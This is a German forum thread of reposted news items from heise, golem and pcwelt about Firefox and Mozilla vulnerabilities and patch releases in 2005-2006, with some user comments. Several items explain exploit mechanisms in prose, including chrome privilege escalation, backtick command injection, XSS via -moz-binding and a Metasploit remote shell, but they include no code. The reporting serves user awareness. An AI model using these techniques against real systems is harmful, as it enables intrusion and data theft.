-
Details zu korrigierten Sicherheitslecks in Firefox 1.0.1
Die heute veröffentlichte Version 1.0.1 des Mozilla-Ablegers Firefox stopft mehrere Sicherheitslöcher des Open-Source-Browsers.
Bereits Anfang Februar wies Michael Krax auf drei Schwachstellen in Mozilla und Firefox hin. Zur Veröffentlichung von Firefox 1.0.1 demonstriert er deren Bedeutung nochmals eindrucksvoll mit einer Demo names Firescrolling: Scrollt ein Anwender eine Web-Seite mit der Maus zwei Mal nach unten, wird im Hintergrund eine Datei auf seinem System angelegt. Der einzige Hinweis auf die heimlichen Aktivitäten im Hintergrund ist ein veränderter Mauszeiger, wenn dieser in den Scrollbalken fährt. Die Demo könnte genauso gut Dateien löschen oder ein bösartiges Programm im Autostart-Ordner platzieren, sodass es beim nächsten Anmelden automatisch gestartet wird.
Der zentrale Fehler ist die Tatsache, dass Firefox und auch Mozilla nicht ausreichend überprüfen, welche URLs ein Plugin aufruft. So ist es möglich, über eine Flash-Datei eine chrome-URL zu laden. Diese Pseudo-URL steht für das GUI des Browsers und kann Script-Code mit vollem Zugriff auf lokale Ressourcen ausführen. Insbesondere lassen sich dort Objekte zum Zugriff aufs Dateisystem erstellen und via Skript fernsteuern.
Das für einen beträchtlichen Teil der Sicherheitslöcher des Internet Explorer verantwortliche Dreigestirn ActiveX, JScript und lokale Zone findet damit seine Entsprechung in Cross Platform Component Object Model (XPCOM), JavaScript und chrome-URLs; http-equivs "What a drag", bei der mit dem Internet Explorer durch Drag&Drop auf einer Web-Seite ein Programm im Autostart-Ordner landet, erfährt seine Fortsetzung in "Firescrolling" bei Firefox.
Der c't-Browsercheck demonstriert das Problem für Firefox 1.0 unter Windows, aber auch andere Betriebssystemversionen sind betroffen. Anwender sollten die aktuelle Version 1.0.1 installieren. Sie überwacht Plugins besser, sodass dieser Angriff nicht mehr möglich ist. Das deutsche Update ist derzeit noch nicht überall verlinkt; es steht auf dem Mozilla-FTP-Server zum Download bereit.
Quelle und Links : http://www.heise.de/newsticker/meldung/56795
-
Die Mozilla-Foundation hat eine neue Version des Webbrowsers Firefox herausgegeben, die Verbesserungen bei der Stabilität bringt, aber auch einige Sicherheitsprobleme beseitigt. Dazu gehören etwa die Möglichkeit, die eigentliche Quelle eines Downloads zu verschleiern, oder der Bug, durch den sich mittels Drag&Drop eines Images eine ausführbare Datei auf dem lokalen Rechner des Anwenders platzieren lässt.
Auch umgeht die Version 1.0.1 nun wie angekündigt den kürzlich bekannt gewordenen Phishing-Trick bei Internationalized Domain Names (IDN). Bei dem Trick wurden Domainnamen mit länderspezifischen Sonderzeichen registriert. Einige dieser Sonderzeichen sehen jedoch den Buchstaben aus dem lateinischen Alphabet sehr ähnlich. Dies wurde bei der Demonstration der Sicherheitslücke mit der Domain paypal.com gezeigt, indem als erste a ein kyrillischer Buchstabe benutzt wurde. Zwischenzeitlich hatte das Firefox-Team daher erwogen, die Unterstützung von IDN vorrübergehend zu deaktivieren. Nun wird das Problem jedoch umgangen, indem Firefox in der Adressleiste den bei der DNS-Auflösung verwendeten Punycode anzeigt -- der Domainname paypal.com mit kyrillischem a wird dann beispielsweise als "www.xn--pypal-4ve.com" dargestellt.
Die Mozilla-Entwickler hatten vorher mehrfach betont, dass das Problem mit den Phishing-Attacken über manipulierte IDNs eigentlich kein Fehler der Browser ist, sondern ein Problem in der IDN-Implementation. Die Schwäche sei seit langem bekannt und es gebe Richtlinien, wie Provider, Registries und Registrare dieses Problem umgehen könnten. Dass ähnlich aussehende Zeichen in Domain-Namen einmal Sicherheitsprobleme aufwerfen würden, findet schon im Punycode-RFC 3492 Erwähnung. Mitte 2002 wiesen zudem zwei israelische Studenten ebenfalls auf dieses Problem hin.
Mit Firefox in der Version 1.0 konnte die Mozilla-Foundation einige Erfolge feiern und gegen Microsofts Internet Explorer Marktanteile gewinnen. Vor kurzem freuten sich die Mozilla-Entwickler bereits über 25 Millionen Downloads ihrers Standalone-Webbrowsers. Microsoft sah sich mittlerweile sogar gezwungen, entgegen den ursprünglichen Plänen eine neue selbstständige Version des Internet Explorer anzukündigen, die für mehr Sicherheit sorgen soll -- ursprünglich sollte ein neuer Microsoft-Webbrowser mit der nächsten Windows-Version Longhorn verzahnt werden.
Das deutsche Version 1.0.1 ist derzeit noch nicht überall verlinkt; sie steht unter anderem auf dem Mozilla-FTP-Server zum Download bereit.
Quelle und Links : http://www.heise.de/newsticker/meldung/56792
-
Die Mozilla Foundation hat Version 1.0.3 seines Browsers Firefox sowie Release 1.7.7 der Internet-Suite Mozilla herausgebracht. Die Updates schließen neun Sicherheitslücken, darunter ein JavaScript-Problem, das es dem Angreifer ermöglicht, auf dem PC des Opfers Teile des Hauptspeichers auszulesen. Des Weiteren haben die Entwickler drei bislang unveröffentlichte Schwachstellen beseitigt, die sie selbst als kritisch einstufen. Über zwei davon kann ein Angreifer laut Fehlerbeschreibung eigenen Code auf einem Rechner ausführen. Als Workaround hilft hier auch das Abschalten von JavaScript
Ob alle Firefox- und Mozilla-Erweiterungen, die mit den Vorgängerversionen laufen, auch mit den neuen Releases funktionieren, steht zu bezweifeln. Noch gestern waren die Entwickler auf der Jagd nach inkompatiblen Erweiterungen. Die Mozilla-Foundation erklärte aber, man habe mit den Autoren der Erweiterungen zusammengearbeitet. Updates für die einzelnen Extensions, die bereits verfügbar seien oder in den nächsten Tagen veröffentlicht würden, sollten möglicherweise bestehende Probleme mit den neuen Releases beheben.
Quelle und Links : http://www.heise.de/newsticker/meldung/58649
-
Die deutsche Firefox 1.03 gibts mittlerweile auch : http://www.mozilla-europe.org/de/products/firefox/
-
Aktuelle Versionen der Browser-Applikationen beseitigen Sicherheitslücken
Die aktuellen Versionen von Firefox und Mozilla stehen mit deutschsprachiger Oberfläche zum Download bereit. Die aktuellen Versionen beheben vor allem einige Sicherheitslöcher in den Browser-Applikationen, so dass man mit Firefox 1.0.3 und Mozilla 1.7.7 vor möglichen Angriffen geschützt sein sollte.
Neue Funktionen bringen weder Firefox noch Mozilla, vielmehr geht es um das Stopfen von Sicherheitslücken und die Erhöhung der Stabilität. Dabei hatten die Entwickler einige Schwierigkeiten aus dem Weg zu räumen, denn zunächst wollten einige Erweiterungen mit Firefox 1.0.3 nicht laufen. In Zusammenarbeit mit den Autoren der Erweiterungen konnten diese aber gelöst werden.
Sowohl in Firefox 1.0.3 als auch in Mozilla 1.7.7 soll eine Sicherheitslücke geschlossen worden sein, die es einem Angreifer erlaubte, Einblick in bestimmte Bereiche des Speichers zu erlangen. Zudem wurden in Firefox 1.0.3 weitere kleinere Sicherheitslöcher geschlossen sowie ein Fehler in den Sidebar-Lesezeichen von Firefox beseitigt. In der Windows-Variante von Firefox wurde der Fehler bereinigt, dass die Applikation mehrere Einträge im Bereich "Software" der Windows-Systemsteuerung hinterlässt.
Firefox 1.0.3 steht in deutscher Sprache für Windows, Linux und MacOS X zum Download bereit. Mozilla 1.7.7 ist ebenfalls mit deutscher Oberfläche für Windows, Linux und MacOS X zu haben. Neben den Komplettinstallationen stehen für Mozilla 1.7.7 zudem deutsche Sprachdateien für Windows, Linux, MacOS X und OS/2 bereit, falls man die Browser-Suite bereits in englischer Sprache installiert hat.
Quelle und Links : http://www.golem.de/0504/37635.html
-
Das French Security Incident Response Team, früher bekannt als k-otik.com, hat einen Exploit für die aktuelle Version (1.0.3) von Firefox veröffentlicht, mit der Web-Seiten Windows-Anwendern beliebigen Code unterjubeln und diesen ausführen können. Ursache des Problems ist ein Fehler bei der Verarbeitung von Add-ons (Firefox Extensions) durch bestimme JavaScripte. Dadurch kann eine Web-Seite Code im Chrome-Kontext ausführen -- ähnlich der lokalen Zone des Internet Explorers. Chrome-URLs dürfen quasi beliebig auf lokale Ressourcen zugreifen, lassen sich jedoch normalerweise aus Web-Seiten heraus nicht aufrufen. Aber bereits bei den zuletzt in Firefox und Mozilla aufgedeckten Sicherheitslücken zeigte sich, dass Angreifer diese Restriktionen leicht umgehen können.
Der nun aufgetauchte Proof-of-Concept-Exploit schreibt eine Batch-Datei auf das Laufwerk C: und startet sie anschließend. Dazu muss der Anwender nur irgendwo innerhalb des Firefox-Browser-Fensters klicken. Die Demo öffnet nur die Eingabeaufforderung, echter Schadcode hätte so etwa eine Backdoor oder einen Trojaner installieren können. Ein Patch ist derzeit nicht verfügbar, Abhilfe schafft das Abschalten von JavaScript. Die Entwickler sind über die Schwachstelle bereits informiert und schlagen alternativ vor, unter Extras\Einstellungen\Web-Features die Option "Websites das Installieren von Software erlauben" zu deaktivieren.
Die vorliegende Demo scheint aber nicht auf allen Systemen stabil zu funktionieren. Bei einem Test der heise-Security-Redaktion auf einem 64-Bit-System schlug die Demo unter Windows XP SP2 mit Firefox 1.0.3 fehl. Da der Fehler aber nach bisherigen Erkenntnissen nicht auf einem Buffer Overflow beruht, dürfte die "Data Execution Prevention" (DEP, Datenausführungverhinderung) nicht dafür verantwortlich sein. Auf einem 32-Bit-System mit Windows XP SP2 und Firefox 1.0.3 öffnete sich die Eingabeaufforderung, in Firefox 1.0.2 scheint der Fehler wiederum nicht enthalten zu sein.
Die Veröffentlichung des Exploits war eigentlich noch nicht geplant. Nach Angaben des Autors des Original-Exploits, Paul von Greyhat-Security, muss jemand seinen Server geknackt haben und den Code gestohlen haben. Nach heise Security vorliegenden Information ist die Original-Demo aber bereits seit mehreren Tagen im Internet erreichbar, die URL war allerdings nur wenigen Personen bekannt.
Quelle und Links : http://www.heise.de/newsticker/meldung/59374
-
Offenbar hat die Mozilla Foundation mittlerweile ihren Add-on-Server modifiziert, sodass der Exploit nicht mehr funktioniert. Dieser missbraucht nämlich unter anderem die Installationsfunktionen für Erweiterungen, um Schadcode in den Rechner zu schleusen. Standardmäßig darf nur update.mozilla.org Add-ons installieren. Der Fehler im Browser selbst wird damit allerdings nicht beseitigt.
Quelle : www.heise.de
-
Dem möchte ich hinzufügen, dass ich im Falle von Übertragungs- oder ähnlichen Fehlern schon ganz vereinzelt chrome:... URLs gesehen habe, z.B. beim zu schnellen Aufrufen eines zweiten Downloads.
Hat zu nichts geführt, trotz des Erscheinens in der Adressleiste.
Die Installation von Software habe ich schon immer unterbunden, den üblichen Schutz ohnehin drauf. Auto-Updates oder schnell 'mal Plugins holen lassen gehen so natürlich nicht, will ich auch nicht. Sowas mache ich lieber kontrolliert von Hand.
Aktuelle 1.03 und JRE 1.5.0_03
Ich hoffe sehr, das wird zügig behoben!
-
Nach Angaben von Dan Veditz, Leiter der Mozilla Security Group, will die Mozilla Foundation noch Anfang dieser Woche eine neue Version von Firefox veröffentlichen. Diese soll zwei Schwachstellen beseitigen, die in Kombination die am gestrigen Sonntag bekannt gewordene kritische Lücke ergeben. Ob in 1.0.4 auch weitere bislang nicht öffentlich bekannte Lücken gestopft sein werden, ist noch nicht klar. Jedenfalls dürfte das Beseitigen der Fehler den Zeitplan der Entwickler zur Herausgabe der Alpha-Version von 1.1 gehörig durcheinander bringen.
Bis zum Erscheinen von 1.0.4 haben sich die Entwickler zunächst damit beholfen, den vom neuen Exploit benutzten Server addons/update.mozilla.org zu modifizieren. Laut Veditz führt der Aufruf nun auf einen Server, der standardmäßig nicht in der Whitelist eingetragen ist. Der Exploit funktioniert dann nicht mehr.
Die von Paul geschriebene Demo beruht im wesentlichen auf Fehlern in der Verarbeitung von JavaScript und hat zum Ziel, Code in einer so genannten Chrome-Page auszuführen -- ähnlich der lokalen Zone im Internet Explorer. Dort laufen Skripte mit den vollen Rechten von Firefox und haben Zugriff auf alle Ressourcen -- sofern der Anwender als Administrator surft. Der Trick besteht darin, die Firefox-Funktion zum Installieren von Erweiterungen so zu missbrauchen, dass sie eine bestimmte Funktion (installTrigger.install) mit einem präparierten Parameter (IconURL) aufruft. Durch eine Lücke lassen sich Skripte so mit höheren Rechten ausführen. Der Exploit nutzt zudem eine weitere Schwachstelle in der History List, um JavaScripte in einem IFRAME in einem beliebigen Kontext auszuführen.
Dazu ruft der Exploit einmal ein Skript in einem IFRAME auf und navigiert anschließend zu update.mozilla.org, um das Skript ein zweites Mal zu starten und die Installationsfunktion auszuführen. Diesmal allerdings -- durch den Fehler in der History -- mit den Rechten von update.mozilla.org. Der nun angezeigte Installationsdialog enthält ein Bild/Icon, das auf ein weiteres JavaScript (IconURL) zeigt, das nach dem Laden in Firefox schließlich im Kontext Chrome läuft.
Quelle und Links : http://www.heise.de/newsticker/meldung/59390
-
Die Mozilla-Foundation hat Firefox 1.0.4 und Mozilla 1.7.8 herausgegeben, in denen insgesamt vier kritische Sicherheitslücken beseitigt sind. Alle Lücken ermöglichen das Einschleusen und Ausführen von Schadcode, je nach Fehler ist dazu meist nur noch ein Klick des Anwenders innerhalb des Browser-Fensters notwendig. Firefox 1.0.4 liegt bereits auf Deutsch vor, während Mozilla 1.7.8 bislang auf Englisch erhältlich ist.
Unter anderem haben die Entwickler die zwei am vergangenen Wochenende veröffentlichten Fehler beseitigt, für die auch bereits ein Exploit kursierte. Ursprünglich war eine koordinierte Veröffentlichung der neuen Firefox- und Mozilla-Version zusammen mit der Fehlerbeschreibung und dem Exploit geplant. Allerdings wurde der Exploit-Code des Autors -- Paul von GreyHat -- von dessen Server gestohlen und auf diversen Seiten zum Download bereitgestellt. Um zumindest den Exploit unbrauchbar zu machen, modifizierte die Mozilla Foundation den Addon/Update-Server, der für einen erfolgreichen Angriff benutzt wurde.
Zudem sind nun zwei Schwachstellen behoben, die eigentlich schon durch die Versionen 1.0.3 von Firefox und 1.7.7 von Mozilla hätten erledigt sein sollen. Allerdings zeigte sich bei Tests von Michael Krax und Georgi Guninski, dass sich durch eine Variation des Exploit-Codes die Favicon-Lücke weiter ausnutzen lässt. So funktionierte eine neue Version der Firelinking-Demo von Krax durch den Einsatz von JavaScript-URLs wieder. Offenbar haben die Entwickler nur um den Exploit herum gepatcht, ohne das eigentliche Loch zu stopfen. Auch die DOM-Sicherheitslücke soll nun in den Browsern der Foundation durch weitere Sicherheitschecks vollständig geschlossen sein.
Dass sich die zwei älteren Lücken noch ausnutzen ließen, war immerhin einem eingeweihten Kreis seit Wochen bekannt, die ihre Entdeckung allerdings nicht veröffentlichten, sondern an die Entwickler meldeten. Glücklicherweise kam es in diesen Fällen nicht zu einem Informationsleck wie bei dem Exploit von Greyhat.
Ob die neue Version die Firelinking-Lücke auf dem eigenen System auch wirklich beseitigt, können Anwender mit dem neuen c't-Browsercheck "Installieren von Programmen über Link-Icons" auf heise Security überprüfen. Bei einem Test von Firefox 1.0.4 unter Windows XP mit Service Pack 2 funktionierte die Demo nicht mehr.
Ob und inwiefern auch Netscape von den zwei neuen Lücken betroffen ist, müssen weitere Tests zeigen. Zumindest die ältere DOM-Lücke und ein Fehler bei der Verarbeitung bestimmer GIF-Bilder finden sich auch dort.
Quelle und Links : http://www.heise.de/newsticker/meldung/59490
-
Aktuelle Mozilla-Version behebt Sicherheitslücken
Nachdem am gestrigen 12. Mai 2005 einige Sicherheitslücken in Firefox und Mozilla behoben wurden, steht nun die Mozilla-Suite in der aktuellen Version 1.7.8 auch in deutscher Sprache für alle Plattformen zum Download bereit. Der aktuelle Firefox 1.0.4 erschien gestern bereits kurz nach der englischsprachigen Version auch in deutscher Ausführung.
Mozilla 1.7.8 erhält eine verbesserte Rechtekontrolle, die sicherstellen soll, dass JavaScript-Aktionen immer mit den zugewiesenen Rechten ausgeführt werden. Damit soll verhindert werden, dass Angreifer ihre Rechte per JavaScript ausweiten können. Eine ebenfalls nun geschlossene Sicherheitslücke erlaubte einem Angreifer über Favicons und JavaScript das Ausführen von Programmcode. Zudem hat das Mozilla-Team Fehler bei der DHTML-Ansicht behoben.
Außerdem wurde das Anfang der Woche in Firefox entdeckte Sicherheitsloch auch in Mozilla beseitigt, auch wenn die Browser-Suite davon nur teilweise betroffen ist.
Eine deutschsprachige Version von Mozilla 1.7.8 steht ab sofort für Windows, Linux und MacOS X kostenlos zum Download bereit. Da Netscape die gleiche Rendering-Engine wie Mozilla verwendet, dürften die Sicherheitslücken auch darin stecken, allerdings wurde das bislang weder bestätigt noch wurde ein Patch veröffentlicht.
Quelle und Links : http://www.golem.de/0505/38042.html
-
Die Mozilla-Foundation hat Version 1.0.5 ihres Standalone-Webbrowsers Firefox herausgegeben. Wie schon Firefox 1.0.4 schließt die neue Ausgabe vor allem Sicherheitslücken. Dazu gehört unter anderem die erneut aufgetauchte Schwachstelle, um Anwendern im Browserfenster falsche Seiten unterzuschieben (siehe dazu den c't-Browsercheck Phishing mit Fenstern). Auch mehrere Schwachstellen, über die Angreifer beliebigen Code ausführen können, und beispielsweise das Problem mit untergeschobenen falschen JavaScript-Dialogboxen wurden in Firefox 1.0.5 korrigiert.
Details zu den korrigierten Sicherheitslücken beschreiben die Entwickler unter Known Vulnerabilities in Mozilla Products. Die Release-Notes geben nähere Auskunft über sonstige Neuerungen in Firefox 1.0.5, erwähnen über die Sicherheitsfixes hinaus aber nur "Verbesserungen bei der Stabilität" und eine Änderung in den Shortcuts unter Linux, die den GTK-Einstellungen entsprechen sollen. Zum Download liegt die neue Version von Firefox bislang in englischer Sprache vor, andere Landessprachen-Ausgaben sollten in Kürze ebenfalls verfügbar sein.
Außerdem haben die Mozilla-Entwickler Deer Park Alpha 2 veröffentlicht, eine weitere frühe Testversion von Firefox 1.1, die wie die erste Alpha-Version nicht für den normalen Einsatz gedacht ist. Vor allem Softwareentwickler, die beispielsweise Erweiterungen herstellen, sollen die neue Version testen, um Probleme herauszufinden. Die neue Alpha-Version bringt unter anderem ein Update-System, mit den neue Ausgaben des Browsers nicht immer komplett neu installiert werden müssen, und beispielsweise die Möglichkeit, im Browserfenster geöffnete Tabs mit Webseiten per Drag&Drop neu anzuordnen.
Quelle und Links : http://www.heise.de/newsticker/meldung/61631
-
Für drei der mit dem aktuellen Update in der Websuite Mozilla 1.7.9 und dem Standalone-Webbrowser Firefox 1.0.5 behobenen Schwachstellen wurden bereits Demo-Exploits veröffentlicht. Zumindest zwei erschleichen sich die Privilegien des Chromes, also dem User-Interface des Browsers. Mit diesen Rechten ausgestattet, können sie unter anderem Dateien schreiben und ausführen. Allerdings funktionieren die bisher veröffentlichten Exploits nicht ohne Mitwirkung des Anwenders.
Die Firewalling-Demo stammt einmal mehr von Michael Krax und ähnelt dessen vorherigen Exploits in der Vorgehensweise: Sie schleust eine javascript:-URL in den Dialog "Set As Wallpaper" ein. Dieser Code kann dann erweiterte Privilegien anfordern.
Auch der Hacker mit dem Pseudonym moz_bug_r_a4 nutzt diesen Dialog. Allerdings ist in seinem Exploit der eigentliche Trick, in einem XHTML-Dokument ein speziell geformtes <IMG>-Element einzubauen, um damit die Sicherheitschecks zu umgehen und ebenfalls Chrome-Privilegien anzufordern.
Kohei Yoshino nutzt die Tatsache aus, dass man auch über data:-URLs JavaScript-Code in einen Link schreiben kann, dies aber im Gegensatz zu den javascript: an manchen Stellen nicht kontrolliert wird. So kann er in seiner Demo über die Sidebar Script-Code in andere, geöffnete Seiten einschleusen und damit zum Beispiel Cookies stehlen. Dies ist ein klassischer Cross-Site-Scripting-Angriff.
Mit den konzeptionellen Problemen in Mozilla & Co, die solche Lücken ermöglichen, befasst sich der Artikel "Löchrige Rüstung; Mozillas Sicheheitskonzept zeigt Lücken" in c't 14/05, S. 202. heise Security veröffentlicht eine englische Übersetzung des Artikels: Chrome-plated holes
Quelle und Links : http://www.heise.de/newsticker/meldung/61646
-
Die neue Release 1.0.7 des beliebten Alternativ-Browsers Firefox stopft eine kritische Lücke in der Linux-Version und bessert weitere Fehler aus. Das Entwickler-Team rät zu einem umgehenden Update auf die neue Version des Browsers und stellt zugleich die englische Fassung bereit.
Durch die neu entdeckte Lücke in den Linux-Versionen des Browsers können beim Programmaufruf von Firefox mit einer URL als Parameter beliebige Befehle auf der Shell ausgeführt werden. Dieses Leck entsteht durch eine fehlerhafte Eingabeprüfung im aufgerufenen Script, wodurch mit "`" in die URL eingebettete Befehle ausgeführt werden. Beispielsweise Mail-Clients rufen Links in E-Mails derartig auf, sodass ein Angreifer mit präparierten Mails Schaden anrichten könnte.
Obendrein fixen die Mozilla-Entwickler die Lücke beim Parsen internationaler Domain-Namen -- also Internetadressen mit Umlauten und anderen internationalen Sonderzeichen --, für die es bisher nur einen Workaround gab.
Bis jetzt findet sich auf den Mozilla-Servern nur die englische Fassung der neuen Release, in Kürze sollte sich aber auch das Download-Verzeichnis für die übersetzten Versionen füllen.
Siehe dazu auch:
* Changelog der Mozilla-Entwickler zu Firefox 1.0.7
* Download-Verzeichnis für lokalisierte Firefox-1.0.7-Versionen
* Meldung zur IDN-Lücke von heise Security
* Bugzilla-Eintrag zum Linux-Kommandozeilen-Fehler in Firefox 1.0.6
Quelle und Links : http://www.heise.de/newsticker/meldung/64115
-
Seit kurzem ist die Windows-Version 1.07 auch auf Deutsch verfügbar.
p.s. got it ;)
-
Das Mozilla-Team warnt zwei Tage nach Veröffentlichung der neuen Versionen vor weiteren, kritischen Lücken der älteren Browser. Neben den bereits bekannten Problemen mit IDN-Domainnamen und Kommandozeilenparametern unter Linux beseitigen Firefox 1.0.7 und Mozilla 1.7.12 acht weitere Schwachstellen. Besonders kritisch dabei: ein Heap-Overflow beim Auswerten von Bildern im X-Bitmap-Format (XBM) und Probleme beim Umgang mit speziellen Unicode-Füllzeichen -- den so genannten Zero-width non-joiners. Beide erlauben es möglicherweise, fremden Code auf das System eines Anwenders einzuschleusen und auszuführen.
Das gilt zwar auch für einen von Guninski entdeckten JavaScript Integer Overflow, dieser ist allerdings nur als "schwerwiegend" eingestuft. In derselben Kategorie firmieren zwei Lücken, über die eine unprivilegierte about-Seite Chrome-Seiten mit höheren Rechten laden kann. Sollte eine weitere Lücke die Steuerung dieser Chrome-Seiten erlauben, ließen sich darüber beispielsweise Programme nachladen und ausführen (siehe auch Chrome-plated holes).
Die vollständige Liste der sicherheitsrelevanten Bugfixes mit den relativ nichtssagenden Beschreibungen findet sich im Mozilla-Advisory. Die referenzierten Einträge in der Fehlerdatenbank, die genaueren Aufschluss über die Hintergründe gäben, sind allerdings noch gesperrt. Ein Thunderbird-Update für das in Firefox beseitigte Problem mit Kommandzeilenparametern unter Linux steht noch aus.
Siehe dazu auch:
* Security Advisory des Mozilla-Teams
Quelle und Links : http://www.heise.de/newsticker/meldung/64209
-
Das nur von Browsern der Mozilla-Familie unterstützte Element für Cascading Stylesheets (CSS) "-moz-binding" lässt sich nutzen, um mit Hilfe einer manipulierten Website beliebigen JavaScript-Code in das Document Object Model (DOM) des Browsers einzuschleusen. Dadurch ist es möglich, so genannte Inter-Domain-Zugriffe auf Daten durchzuführen, die andere Websites zur Identifizierung des Nutzers im Browser hinterlegen, wie beispielsweise Cookies und Session-IDs. Schlimmstenfalls kann ein Angreifer durch dieses Cross-Site-Scripting (XSS) auf den Namen des Opfers beispielsweise Bezahldienste und Online-Portale nutzen und Zugang zu weiteren sensiblen Daten erlangen.
Betroffen von dem Problem sind alle Browser der Mozilla-Familie einschließlich Netscape und Firefox. Auch das gerade erst freigegebene Update auf Firefox 1.5.0.1 behebt das Problem noch nicht. Ursprünglich sollte "-moz-binding" Stylesheet-Entwicklern stärkeren Einfluss auf das Erscheinungsbild des Browsers ermöglichen. Doch ähnlich der DHTML-Lücke des Internet Explorers und der Chrome-Problematik von Mozilla bergen derartige Funktionen auch ein häufig unterschätztes Potenzial für Missbrauch.
Siehe dazu auch:
* Eintrag in der Fehlerdatenbank von Mozilla
Quelle und Links : http://www.heise.de/security/news/meldung/69159
-
Anwender von Firefox 1.5 und des Mozilla-Nachfolgers Seamonkey vor Version 1.0 sollten so bald wie möglich auf die vergangene Woche veröffentlichten Versionen wechseln. Darin sind insgesamt acht Schwachstellen beseitigt, für die nun auch der erste Exploit kursiert, der auf einem verwundbaren System eine über das Netzwerk erreichbare Shell öffnen soll. Der Exploit nutzt eine Lücke in der QueryInterface-Funktion aus, über die sich Code einschleusen lässt. Dazu reicht bereits der Aufruf einer präparierten Webseite aus. Der Exploit ist nach Angaben des Autors, H.D. Moore von Metasploit, für die Zielplattform Linux erstellt worden. Mit dem Metasploit-Framework lässt sich aber auch leicht Windows als Zielplattform konfigurieren.
Aufgrund der Veröffentlichung des Exploits hat die Mozilla Foundation das Risiko der Lücke gestern auch auf kritisch hochgestuft. Mozilla 1.7 und Firefox 1.0.x sind laut Security Advisory nicht von dem Problem betroffen. Allerdings ist die Lücke wohl auch in Thunderbird 1.5 zu finden, sofern JavaScript aktiviert ist. In der Standardkonfiguration ist dies aber nicht der Fall.
Für die zweite kritische Lücke in Firefox und Seamonkey gibt es zum Glück noch keinen Exploit. Zwar ist das Loch in Firefox 1.5.0.1 und Seamonkey 1.0 geschlossen, aber Firefox 1.0.8 lässt noch auf sich warten. Aus diesem Grund halten die Entwickler auch die Details zu der Lücke zurück – derzeit liegt auf dem dazugehörigen Bugzilla-Datenbankeintrag noch ein Embargo. Nur so viel verrät das Advisory: Die Funktion XULDocument.persist wertet einige Attributnamen nicht korrekt aus, sodass ein Angreifer mit präparierten Namen JavaScript-Code in die Datei localstore.rdf schreiben kann, in der etwa die Konfiguration der Browseroberfläche (Chrome) gespeichert ist. Diese wird bei jedem Browserstart gelesen und ausgeführt. Thunderbird ist grundsätzlich auch betroffen, allerdings nur, wenn JavaScript angeschaltet ist. Eine fehlerbereinigte Thunderbird-Version gibt es noch nicht.
Auch das Problem beim Aufruf von Seiten mit überlangen Namen soll nun nicht mehr auftreten: Beim Neustart blieb der Browser in jedem Fall komplett hängen, bis die Datei history.dat gelöscht wurde. Die restlichen fünf Lücken, zu denen die Mozilla Foundation ebenfalls Fehlerreports veröffentlicht hat, sind weniger kritisch, einige erlauben aber prinzipiell auch das Einschleusen und Ausführen von Schadcode. Der Großteil der Fehler wurde aber erst mit der Entwicklung von Firefox 1.5 und Seamonkey eingeführt.
Siehe dazu auch:
* Sicherheitslücken in Firefox, Mozilla, Seamonkey und Thunderbird Übersicht der Mozilla Foundation
* Metasploit:Exploits für alle Hintergrund-Artikel auf heise Security
Quelle und Links : http://www.heise.de/security/news/meldung/69331
-
Laut einer Sicherheitsmeldung von Securident patzt der Open-Source-Browser Firefox bei der JavaScript-Anweisung iframe.contentWindow.focus(). Wenn Firefox auf bestimmte Konstrukte mit dieser Anweisung trifft, kann es zum Browserabsturz kommen. Die Entdecker der Schwachstelle gehen davon aus, dass es sich hierbei um einen Pufferüberlauf handelt, den Angreifer zum Ausführen von beliebigen Code nutzen könnten.
Betroffen ist Firefox in Version 1.5.0.2, zur Zeit ist noch kein fehlerbereinigter Firefox-Build verfügbar. Abhilfe schafft das Abschalten der Unterstützung für JavaScript unter den Inhalt-Einstellungen im Extras-Menü, bis die Firefox-Entwickler einen Patch bereitstellen. Jedoch zeigt der Browser dann diverse Webseiten nicht mehr korrekt an.
Siehe dazu auch:
* Firefox Remote Code Execution and Denial of Service, Sicherheitsmeldung von Securident
Quelle und Links : http://www.heise.de/security/news/meldung/72363
-
Nachdem im kürzlich veröffentlichten Firefox 1.5.0.2 eine Sicherheitslücke entdeckt worden war, haben die Entwickler prompt reagiert und Firefox 1.5.0.3 zum Download bereitgestellt. Der Mail-Client Thunderbird wird in Kürze in der Version 1.5.0.4 erscheinen.
Firefox ist in der Version 1.5.0.3 erschienen. Mit der neuen Version wird eine kürzlich entdeckte Sicherheitslücke gestopft, die wegen eines Javascript-Fehlers den Browser zum Absturz bringt.
Sicherheitsexperten hatten vor der Lücke gewarnt, weil die Lücke es Angreifern ermöglicht, beliebigen Code auf einem Rechner ablaufen zu lassen. Die Lücke ist bei Bugzilla unter der Nummer 334515 registriert. Ein Proof-of-Concept für diese Lücke existierte bereits bei Bekanntwerden der Lücke, so dass sich die Entwickler entschlossen, schnellstmöglich einen aktualisierten Firefox zu veröffentlichen. Nebeneffekt: Die Entwickler stellen erneut unter Beweis, dass sie schnell auf Sicherheitsprobleme reagieren können.
Firefox 1.5.0.3 ist für Windows, MacOS X (Intel & PowerPC) und Linux in deutscher Sprache verfügbar. Da mit dem Update die Sicherheit des Browsers erhöht wird, ist die sofortige Installation empfehlenswert. Sie können Firefox 1.5.0.3 entweder manuell installieren oder die Update-Funktion von Firefox 1.5.0.2 nutzen. Bei letzterer Variante sparen Sie Downloadzeit und nach einem Neustart ist der Browser auf dem aktuellen Stand.
Der ganze Artikel (http://www.pcwelt.de/news/sicherheit/136794/index.html)
Quelle : www.pcwelt.de
-
Eine Schwachstelle in Firefox kann ausgenutzt werden.
Bereits kurz nach der Bereitstellung der neuen Firefox-Version 1.5.0.3, die eine Sicherheitslücke schließt, wurde eine neue Anfäligkeit gemeldet. Diese soll auch die neue Firefox-Version betreffen, konnte jedoch zunächst nicht nachvollzogen werden. Nun hat das Internet Storm Center ( ISC ) bestätigt, dass eine solche Schwachstelle existiert.
Der in der Vorwoche als Nachweis vorgeschlagene Exploit schien nicht oder nur unter bestimmten Umständen zu funktionieren. Inzwischen hat das ISC einen anderen Exploit erhalten, der nachvollziehbar klappt. Dabei werden mittels Javascript in einer Web-Seite viele "mailto:"-Links erzeugt. Diese stecken in IMG-Tags, also in HTML-Anweisungen, die eigentlich Bilder laden sollten.
Beim Aufruf einer solchen Seite werden die vermeintlichen Bilder geladen, was zum Öffnen zahlloser Mail-Fenster führen kann. Dadurch kann der Rechner soweit ausgelastet werden, dass er nicht mehr auf Benutzeraktionen reagiert oder gar abstürzt. Das kann im Einzelfall auch davon abhängen, welches Mail-Programm in Firefox als für mailto-Links zuständig eingetragen ist.
